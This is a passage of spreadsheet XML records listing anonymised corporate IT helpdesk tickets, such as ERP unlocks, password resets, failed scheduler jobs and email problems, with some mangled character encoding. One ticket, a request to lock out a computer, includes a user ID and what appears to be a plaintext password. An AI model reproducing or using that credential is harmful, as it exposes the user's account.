    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_would you pls help to create delivery note for sto 5019130534,for something error we unable to create, it's urgent for plant_298. "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="5"/>
  </r>
  <r>
    <s v="æ¶‚å±‚ã€ç®¡ä¸è½¦é—´ç”µè¯æ•…éšœ"/>
    <s v="æ¶‚å±‚ã€ç®¡ä¸è½¦é—´ç”µè¯æ•…éšœï¼Œ40634943ã€39523835"/>
    <s v="vrmpysoz qkiucpdx"/>
    <x v="47"/>
  </r>
  <r>
    <s v="ç½‘ç»œä¸é€š"/>
    <s v="ç½‘ç»œä¸é€šï¼Œå³ä¸‹è§’ç½‘ç»œå›¾æ ‡æ˜¾ç¤ºæœªè¿žæŽ¥åˆ°ç½‘ç»œã€‚"/>
    <s v="neovalui kabpfvic"/>
    <x v="47"/>
  </r>
  <r>
    <s v="inc1544491 fwd: collaboration_platform"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mdbegvct.dbvichlg@gmail.com_x000d__x000a__x000d__x000a_i tried opening a discount on my phone and it appears to want me to download this ap on my phone.  is that ok?_x000d__x000a__x000d__x000a_"/>
    <s v="mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms excel file not opening -error procted view -file hangs."/>
    <s v="ms excel file not opening -error procted view -file hangs._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-unchecked the proctected view option._x000d__x000a_-caller confirmed that he was able to ope the excel files now._x000d__x000a_-issue resolved._x000d__x000a_"/>
    <s v="unslcdbo jfwqcira"/>
    <x v="0"/>
  </r>
  <r>
    <s v="this morning i could not log in to my computer so, please lock out my computer."/>
    <s v="this morning i could not log in to my computer so, please lock out my computer._x000d__x000a_id omokam_x000d__x000a_ps mizumoto2_x000d__x000a_"/>
    <s v="svuboezf wegtszum"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user unable to hotel wi-fi "/>
    <s v="user unable to hotel wi-fi _x000d__x000a_-advised the user to shut down the pc for 30 sec and restart the device._x000d__x000a_-opened network and shatryung center and enabled the wi-fi connection._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="sgheqbly mcboawld"/>
    <x v="0"/>
  </r>
  <r>
    <s v="symantec endpoint encryption (see) agent deployment"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hkrecpfv.kgwpbexv@gmail.com_x000d__x000a__x000d__x000a_hello.  i don't believe my computer has downloaded the new symantec endpoint encryption (see) agent.  should i be concerned yet?  the received the email about it almost a month ago._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="hkrecpfv kgwpbexv"/>
    <x v="65"/>
  </r>
  <r>
    <s v="wfnbtpkg ixecamwrs email : inplant_843772"/>
    <s v="_x000a__x000a_received from: oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_i had marftgytins emails being filtered to myself and it was removed_x000a__x000a_i still have emails being sent to marftgytin instead of myself and i need his emails reset up in my outlook_x000a__x000a_dthyan matheywtyuews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="26"/>
  </r>
  <r>
    <s v="job Job_1953d running longer than 30 minutes kirtyled and rerun "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1953d failed in job_scheduler at: 08/23/2016 17:29:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="erp login SID_34 missing."/>
    <s v="erp login SID_34 missing._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-configured the erp SID_34 on the user pc._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="pnwcubqr qdlocnzt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_39 account unlock"/>
    <s v="erp SID_39 account unlock"/>
    <s v="elivbznp tynvpcfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="solidworks simulation "/>
    <s v="hi,_x000d__x000a__x000d__x000a_we request you to provide the details/support to beacon india who is providing technical support for solidworks usage at msg design. _x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="mtkpwcxz vxouhram"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to access sales and markhtyeting tab"/>
    <s v="unable to access sales and markhtyeting tab"/>
    <s v="hpakdzyj lkrtvosz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype screen share issue"/>
    <s v="when shatryung my screen the other person is only seeing my mouse error and a beshryu screen.  whenever i give them access to my machine, the view appears.  please advise how to correct, as i do not want to give everyone access to my pc in order to have a screen share.  "/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="receiving the following notification in erp-SID_34"/>
    <s v="my inbox is being overwhelmed with notification of a write error.  these appear to be related to south_amerirtca n-fe.  my userid is affiliated with an n-fe transaction,  see attached screenshot"/>
    <s v="dctviemg muapxkns"/>
    <x v="9"/>
  </r>
  <r>
    <s v="errror submitting discount request form in collaboration_platform"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zfburidj.jmilguev@gmail.com_x000d__x000a__x000d__x000a_hi there - get the following error when trying to submit this request. can you please look into this for me.- markhty_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1fd58.19c782f0]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="zfburidj jmilguev"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage : cantabria site is hard down at 3:33 pm et on 08/23. no backup circuit for the site."/>
    <s v="what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __no_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___3:33 pm et on 08/23___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 ____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ______no__     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na_______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ___na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unable to load outlook"/>
    <s v="unable to load outlook"/>
    <s v="obanjrhg rnafleys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for mdbegvct.dbvichlg@gmail.com"/>
    <s v="request to reset microsoft online services password for mdbegvct.dbvichlg@gmail.com"/>
    <s v="mdbegvct dbvichlg"/>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ewvugfcy nxbdajgh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // no number // no warehouse_tool"/>
    <s v="blank call // no number // no warehouse_tool"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp plm - change bom plant_248"/>
    <s v="please, change in mass, the mm below at plant_248_x000d__x000a__x000d__x000a_from to_x000d__x000a_6092264 5981083_x000d__x000a_6092266 5981084_x000d__x000a_6092268 5981085_x000d__x000a_6092269 5981086_x000d__x000a__x000d__x000a_"/>
    <s v="zuyimtsf qjtimdsp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="message:HostName_1147.company.com.is connected? is not connected"/>
    <s v="received reporting_tool alert at 2:53 pm on 08/23 et:_x000d__x000a__x000d__x000a_HostName_1147.company.com.is connected? is not connected"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="employee owned mobility agreement"/>
    <s v="_x000d__x000a__x000d__x000a_received from: oqvwgnkc.gkjylpzx@gmail.com_x000d__x000a__x000d__x000a_hello.  i need help getting my phone linked with email and skype.  please see the attached_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="oqvwgnkc gkjylpzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="stock transfer order errors - pricing and transfer pricing"/>
    <s v="user is attempting to create a stock transfer order (#5019143070) in erp for the following situations and is receiving the errors below:_x000d__x000a__x000d__x000a_sender reciever material created quantity  requsted quantity  sto number error code_x000d__x000a_plant_105 plant_101 2191584                  1           error in net price calculation, item 000001 (please correct)_x000d__x000a_plant_105 plant_101 2355391                  3            please enter net price_x000d__x000a__x000d__x000a_could someone please review the rqfhiong zkwfqagbs and pricing to see why the errors are being received by the analyst creating the sto?  an average customer net price (vk13 - zttf) exists for 2191584 so there should be no error.  no average customer net price exists for 2355391 so the system should automatically simulate a price._x000d__x000a__x000d__x000a_"/>
    <s v="wgothrzl iokdftgn"/>
    <x v="29"/>
  </r>
  <r>
    <s v="erp login error message"/>
    <s v="error message states &quot;the specified path does not exist&quot;"/>
    <s v="oqvwgnkc gkjylpzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot get access to email"/>
    <s v=" ext.117_x000a_since yesterday i'm unable to get on microsoft email, usually i go on the km home page then i go to my bookmarkhty to where the email page is, it keeps loading and doesn't go to the email page"/>
    <s v="rqnxlkce nvrzduyk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="import device type settings from s12 to d &amp; q system"/>
    <s v="import device type settings from s12 to d &amp; q system"/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="collaboration_platform login issue."/>
    <s v="ess login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and reset the password._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="bnphimjq osmwbjva"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="vbgmdxuc egflrbou"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the same material was posted in two different plants. display material document 5042203567. mov. 541 mm#3475529"/>
    <s v="sometimes we need to send some material to the vendors for manufacturing different kind of new itens to company. in this case, when we sent the mm# 4586630 to the external vendor, the system make two different moviments. one at plant plant_248 and another at plant plant_250. because of this problem, we cannot create a nota financial_toolcal and we cannot reverse the moviment."/>
    <s v="yjcxvrhu mlqfuapc"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job SID_53hotf failed in job_scheduler at: 08/23/2016 13:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_53hotf failed in job_scheduler at: 08/23/2016 13:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="1"/>
  </r>
  <r>
    <s v="unlocked erp password"/>
    <s v="unlocked erp password"/>
    <s v="fyjivxud ztasbivg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_41hotf failed in job_scheduler at: 08/23/2016 12:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_41hotf failed in job_scheduler at: 08/23/2016 12:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="1"/>
  </r>
  <r>
    <s v="job SID_53hotf failed in job_scheduler at: 08/23/2016 12:42:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_53hotf failed in job_scheduler at: 08/23/2016 12:42:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="1"/>
  </r>
  <r>
    <s v="job SID_44hotf failed in job_scheduler at: 08/23/2016 12:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_44hotf failed in job_scheduler at: 08/23/2016 12:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="1"/>
  </r>
  <r>
    <s v="user called in for an update"/>
    <s v="user called in for an update"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login + password very urgent for esprit"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ufzxpadv.hnxmotwu@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i would like a login and password for our partner from dp technology for tomorrow ?_x000d__x000a__x000d__x000a_is it possible to create it aerp?_x000d__x000a__x000d__x000a_"/>
    <s v="ufzxpadv hnxmotwu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to create a partial delivery today on so 35645376 which is structured using the higher level linkage."/>
    <s v="when creating the delivery note it reflects the correct quantities, but when saving it defaults to full quantities.  attached is a listing of what line items and quantities are needed.  shipment needs to be made to day.  customer is in need.  "/>
    <s v="qtrmxlgv dfruzvam"/>
    <x v="17"/>
  </r>
  <r>
    <s v="lead form component not working in prod"/>
    <s v="i have just discovered the lead forms for both road king and beyond evolution are not working. both pages can be found by clicking the banners on the english homepage. then try clicking the call to action buttons (see attached). also there is a page in qa i used for uacyltoe hxgayczeing, it is also not working._x000d__x000a__x000d__x000a_#/content/company/en/recs-uacyltoe hxgaycze/responsive-recs.html_x000d__x000a__x000d__x000a_"/>
    <s v="lenxvcbq vwnhjtoi"/>
    <x v="50"/>
  </r>
  <r>
    <s v="computer loading temp profile whenever user is logging in with his id and password"/>
    <s v="computer loading temp profile whenever user is logging in with his id and password._x000d__x000a__x000d__x000a_user id - bhergtyemm"/>
    <s v="fmjwzstr yjotleqg"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp plm - engineering tool programdnty start error"/>
    <s v="post login screen receiving attached error_x000d__x000a__x000d__x000a_reinstalled java to the recommended version (32 and 64 bit)_x000d__x000a_deleted engineering tool install from programdnty data folder and retried install, still no go._x000d__x000a__x000d__x000a_verified login ability to SID_34 system with same id and password._x000d__x000a__x000d__x000a_please contact ertnhxkf gwjibhxm to get access to this new pc"/>
    <s v="hiqkujla vwkdmntg"/>
    <x v="10"/>
  </r>
  <r>
    <s v="printer not kicking out delivery notes"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rtpmlwnk.unpambrv@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i work at the usa, il plant.  when we enter orders in erp they would always kick out the &quot;delivery note&quot;.   for some reason, they have stopped printing.  raifstow gfeymtql and i both are not receiving the delivery notes for the reconditioning orders.  i have a screen shot below that shows that i am set up for printer output device &quot;qv20 &quot;.  can you help to make our delivery notes &quot;automatic&quot; like previously?_x000d__x000a__x000d__x000a_"/>
    <s v="rtpmlwnk unpambrv"/>
    <x v="17"/>
  </r>
  <r>
    <s v="unable to launch hr_tool etime"/>
    <s v="unable to launch hr_tool etime"/>
    <s v="dcqsolkx kmsijcuz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot open a pptx file that was attached to an email.  gives a repair error. "/>
    <s v="i cannot open a pptx file that was attached to an email.  gives a repair error. "/>
    <s v="xdabnget wryuikgd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to see fioghtna wightygins emails"/>
    <s v="unable to see fioghtna wightygins emails"/>
    <s v="iqcylpok ascpqvni"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2: unable to login to the hub"/>
    <s v="vip 2: unable to login to the hub"/>
    <s v="qdilorms feayhdmu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="frequent account lockout"/>
    <s v="frequent account lockout"/>
    <s v="jusenflm sufbehom"/>
    <x v="0"/>
  </r>
  <r>
    <s v="create delivery note  2053495 / plant plant_120 / slc 0088 / apo error / urgent  eilt"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tkuivxrn.urdgitsv@gmail.com_x000d__x000a__x000d__x000a_help,_x000d__x000a__x000d__x000a_plaese create delivery note for material 2053495, to be shipped to plant_223._x000d__x000a__x000d__x000a_please also advice why apo does not work correct and what corrective actions are required._x000d__x000a__x000d__x000a_franhtyu,_x000d__x000a__x000d__x000a_fyi, what reason caused this error? did you investigate?_x000d__x000a__x000d__x000a_kind "/>
    <s v="qgopxabz xnuieqjr"/>
    <x v="5"/>
  </r>
  <r>
    <s v="ticket update inplant_852304"/>
    <s v="ticket update inplant_852304"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to dell 7350 tablet"/>
    <s v="unable to login to dell 7350 tablet"/>
    <s v="bycusxji qeafbkro"/>
    <x v="0"/>
  </r>
  <r>
    <s v="internet through telecom_vendor_3 now working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ywfhcuki.dajkmxcl@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i always get the error of limited connectivity even after having good network of telecom_vendor_3._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1fd75.1e9817a0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ywfhcuki dajkmxcl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to download a software"/>
    <s v="unable to download a software"/>
    <s v="csmhykge mpxbjudw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to drawings"/>
    <s v="name:mikhghytr karaffa_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vfrdxtqw.jfbmsenz@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:requesting drawing access in erp modeling majetkm"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="from: nwfodmhc exurcwkm _x000d__x000a_sent: tuesday, august 23, 2016 4:35 pm_x000d__x000a_to: mkjubdti fbusqrlt_x000d__x000a_cc: tiyhum kuyiomar_x000d__x000a_subject: request to reset microsoft online services password for mkjubdti.fbusqrlt@gmail.com_x000d__x000a__x000d__x000a_hi rodny_x000d__x000a__x000d__x000a_please change your password in _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="mkjubdti fbusqrlt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_853211"/>
    <s v="ticket update on inplant_853211"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: please take this survey related to ticket_no0432312"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cowqyjzm.fzsxgapt@gmail.com_x000d__x000a__x000d__x000a_has this been remapped?_x000d__x000a__x000d__x000a_"/>
    <s v="cowqyjzm fzsxgapt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delivery notes has generated delivery-with wrong delivery pieces"/>
    <s v="delivery notes has generated delivery-with wrong delivery pieces_x000d__x000a__x000d__x000a_one of the colleague generated dn with actuall pieces 450 pcs. with mm 3332059_x000d__x000a_but when the delivery note was printed we notices that it shows the deliverable pieces as 450 pcs. instead of 400 pcs._x000d__x000a_erp should not allow this??_x000d__x000a_there was earlier kind of issue, reference ticket inc1188203_x000d__x000a_"/>
    <s v="mtwzniyh orbjskip"/>
    <x v="17"/>
  </r>
  <r>
    <s v="unable to log in to skype"/>
    <s v="unable to log in to skype"/>
    <s v="hdfcwmag plxstkad"/>
    <x v="0"/>
  </r>
  <r>
    <s v="german call // caller disconnected after hearing english"/>
    <s v="german call // caller disconnected after hearing english"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not responding "/>
    <s v="outlook not responding "/>
    <s v="hdfcwmag plxstkad"/>
    <x v="0"/>
  </r>
  <r>
    <s v="software installation"/>
    <s v="software installation"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the caller id display on users desk phone does not display correctly"/>
    <s v="from: cwuospin nbhoxqpe _x000a_sent: tuesday, august 23, 2016 5:19 pm_x000a_to: chukhyt mcnerny; -facility; nwfodmhc exurcwkm_x000a_subject: amar re: desk phone_x000a__x000a_help desk,_x000a__x000a_please see chukhyt's request_x000a__x000a_sincerely,_x000a__x000a_stanfghyley guhtykes, fmp_x000a_facilities manager, world headquarters_x000a_cwuospin.nbhoxqpe@gmail.com_x000a_"/>
    <s v="ciszbkoh xozqjavr"/>
    <x v="36"/>
  </r>
  <r>
    <s v="need to add additional mailboxes"/>
    <s v="need to add additional mailboxes"/>
    <s v="tqpbazxm jhbkycgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket_no1544198 - ticket update"/>
    <s v="ticket_no1544198 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/23/2016 08:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/23/2016 08:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp connections issue"/>
    <s v="erp connections issue"/>
    <s v="kslhobgj cyhvefna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for gÃ¼lperi akÃ¶z on erp / production / hcm"/>
    <s v="on erp SID_34, SID_37 i  want to reset my password."/>
    <s v="plbwhxqt tqzdygxw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="kiosk user - account expired // onjzqptl kgxmisbj"/>
    <s v="kiosk user - account expired // onjzqptl kgxmisbj"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="jusenflm sufbehom"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot open attachments in owa, shows a white screen when opening. "/>
    <s v="cannot open attachments in owa, shows a white screen when opening. "/>
    <s v="ufixygtn yuoxcmek"/>
    <x v="2"/>
  </r>
  <r>
    <s v="cannot access crm"/>
    <s v="cannot access crm - my contact info is "/>
    <s v="xioapjvd yiqubxmz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="logon balancing error on erp "/>
    <s v="logon balancing error on erp "/>
    <s v="jrzpcesm oznigwvj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="performance improvement for supervisor dashbankrd "/>
    <s v="performance improvement for supervisor dashbankrd._x000d__x000a__x000d__x000a_"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="40"/>
  </r>
  <r>
    <s v="reset the password for chkmejsn lvidgknc on erp / production / erp"/>
    <s v="please unlock my erp account.  i know the password."/>
    <s v="chkmejsn lvidgknc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype will not let me sign in.  says &quot;the address you typed is not valid&quot;"/>
    <s v="skype will not let me sign in.  says &quot;the address you typed is not valid&quot;"/>
    <s v="wjtzrmqc ikqpbflg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="nbdljruw axcrspyh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_24arc1 failed in job_scheduler at: 08/23/2016 07:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_24arc1 failed in job_scheduler at: 08/23/2016 07:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="user id locked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bqyfwclo.osjklifb@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_could you please unlock user id teufeae (upiyobvj lwohuizr)._x000d__x000a__x000d__x000a_our it hotline cannot be reached._x000d__x000a__x000d__x000a_"/>
    <s v="bqyfwclo osjklifb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_30arc1 failed in job_scheduler at: 08/23/2016 06:50:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_30arc1 failed in job_scheduler at: 08/23/2016 06:50:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="collaboration_platform cloud ordner gelÃ¶scht"/>
    <s v="_x000a__x000a_received from: uwncfovt.vxjbunfi@gmail.com_x000a__x000a_guten tag,_x000a__x000a_ganz wichtig! meine kompletten daten!! sind gelÃ¶scht! selbst in der cloud wurde der ordner â€žvw team&quot; komplett gelÃ¶scht!_x000a_bitte den â€žvw ordner&quot; wiederherstellen mit datum von gestern! wenn das geht! ganz wichtig!_x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a_uwncfovt vxjbunfi_x000a__x000a_sales engineer_x000a_mail: uwncfovt.vxjbunfi@gmail.com&lt;mailto:uwncfovt.vxjbunfi@gmail.com&gt;_x000a__x000a_company deutschland gmbh_x000a_geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, phvkowml azbtkqwx, naruedlk mpvhakdq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uwncfovt vxjbunfi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_23arc1 failed in job_scheduler at: 08/23/2016 06:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_23arc1 failed in job_scheduler at: 08/23/2016 06:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_711 failed in job_scheduler at: 08/23/2016 06:27:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_711 failed in job_scheduler at: 08/23/2016 06:27:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_2021a failed in job_scheduler at: 08/23/2016 06:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2021a failed in job_scheduler at: 08/23/2016 06:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job SID_23arc2 failed in job_scheduler at: 08/23/2016 06:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_23arc2 failed in job_scheduler at: 08/23/2016 06:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="need erp access to user vv180822 for erp incident "/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_21 &amp; SID_1_x000d__x000a__x000d__x000a_enter user id of user having the issue: vv180822_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with: z:plm_general, z:plm_change_coordinator, spro_x000d__x000a__x000d__x000a_describe the issue: can you please create an user account for the erp incident 263306 / 2016 in SID_21 &amp; SID_1. please set the user type to dialog, since erp will need business_client access to create er. please open the wts and http connection also. they would need an active directory account and please give access to roles z:plm_general, z:plm_change_coordinator, spro_x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket. external erp user_x000d__x000a__x000d__x000a_provide access the same as this other user: gthydanp"/>
    <s v="svdefgwl sgtmurfh"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_714 failed in job_scheduler at: 08/23/2016 06:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_714 failed in job_scheduler at: 08/23/2016 06:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="please run job jb_cust_db_file. please assign ticket to ebusaar munnangi"/>
    <s v="hello,_x000d__x000a__x000d__x000a_could you please run the job jb_cust_db_file_x000d__x000a__x000d__x000a_"/>
    <s v="rcbdyslq zuspjbtw"/>
    <x v="20"/>
  </r>
  <r>
    <s v="cross company in erp not allowed"/>
    <s v="on transactions f-43 and f-60, user can no longer process transactions.  please assist in restoring this."/>
    <s v="wifevnpm bkcixfjd"/>
    <x v="9"/>
  </r>
  <r>
    <s v="npc 311104334 mm6283517"/>
    <s v="hello it service,_x000a_my manager serthyei needs to forward the pthsqroz moedyanvess, all the quote drawings are being created and linked to the mm#s as our standard procedure._x000a_for un known reason, this mm 7394628 is not showing the linked drawing. moreover, serthyei was not able to add the document number manually._x000a_please fix this, we need to forward the npc towards successful manufacturing._x000a__x000a_crtgyerine: vlymsnej.whlqxcst@gmail.com_x000a_serthyei: ueywbzks.gepstmfl@gmail.com_x000a_"/>
    <s v="vlymsnej whlqxcst"/>
    <x v="10"/>
  </r>
  <r>
    <s v="erp hcm: zpd_upload_time "/>
    <s v="_x000a__x000a_received from: jywvemun.qngschtz@gmail.com_x000a__x000a_erp team,_x000a_we need to update the report zpd_upload_time for erp hcm_x000a_because of the new 8 digits employee numbers._x000a_please see below._x000a_srgtycha_x000a__x000a__x000a__x000a_von: jfcrdavy sxpotjlu_x000a_gesendet: dienstag, 23. august 2016 11:10_x000a_an: weszfyok fbadnjhu &lt;weszfyok.fbadnjhu@gmail.com&gt;; jywvemun qngschtz &lt;jywvemun.qngschtz@gmail.com&gt;_x000a_cc: pesylifc wnyierbu &lt;pesylifc.wnyierbu@gmail.com&gt;; lixwgnto krutnylz &lt;lixwgnto.krutnylz@gmail.com&gt;; puxsvfwr cwkjruni &lt;puxsvfwr.cwkjruni@gmail.com&gt;_x000a_betreff: aw: inc1530735 -- comments added_x000a__x000a_hallo zusammen,_x000a__x000a_im erp upload-programdntym zpd_upload_time muss die pernr ebenfalls von 6 stellen_x000a_auf die max. lÃ¤nge von 8 stellen angepasst werden:_x000a_[cid:image001.png@01d1fd2e.708348b0]_x000a__x000a_bitte entsprechend veranlassen._x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a__x000a_jfcrdavy sxpotjlu_x000a__x000a_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jywvemun qngschtz"/>
    <x v="20"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="vfoyenlw ntpbdeyf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/23/2016 05:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/23/2016 05:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
